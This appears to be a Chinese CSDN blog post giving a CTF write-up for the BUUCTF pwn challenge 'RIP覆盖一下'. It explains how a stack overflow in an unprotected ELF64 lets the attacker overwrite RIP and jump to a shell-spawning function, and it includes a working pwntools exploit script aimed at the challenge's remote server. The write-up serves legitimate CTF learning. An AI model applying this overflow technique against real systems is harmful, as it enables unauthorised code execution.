【Writeup】BUUCTF_Pwn_RIP覆盖一下

BUUCTF - Writeups 专栏收录该内容
5 篇文章 1 订阅

0x01 解题思路

  • 查看文件信息
    在这里插入图片描述

    ​ 没什么防护措施的ELF64文件。

  • 拖入IDA x64,F5
    在这里插入图片描述
    显然可以通过栈溢出覆盖RIP。

  • 发现命令执行函数
    在这里插入图片描述
    地址为0x401186

  • 利用peda计算输入点距离RIP的偏移值
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    得出偏移量是23
    现在就可以写出覆盖RIP执行fun函数的EXP了。

0x02 EXP

from pwn import *

io=0

def isDebug(debug):
    global io
    if debug:
        io = process('./pwn1')
    else:
        io = remote('pwn.buuoj.cn', 6001)
    
def pwn():
    offset = 23
    payload = 'A'*offset
    funAddr = 0x401186
    payload += p64(funAddr)
    io.sendline(payload)
    io.interactive()

if __name__ == '__main__':
    isDebug(0)
    pwn()

获取flag:
在这里插入图片描述

  • 2
    点赞
  • 5
    评论
  • 1
    收藏
  • 打赏
    打赏
  • 扫一扫,分享海报

©️2022 CSDN 皮肤主题:编程工作室 设计师:CSDN官方博客 返回首页

打赏作者

BAKUMANSEC

你的鼓励将是我创作的最大动力

¥2 ¥4 ¥6 ¥10 ¥20
输入1-500的整数
余额支付 (余额:-- )
扫码支付
扫码支付:¥2
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、C币套餐、付费专栏及课程。

余额充值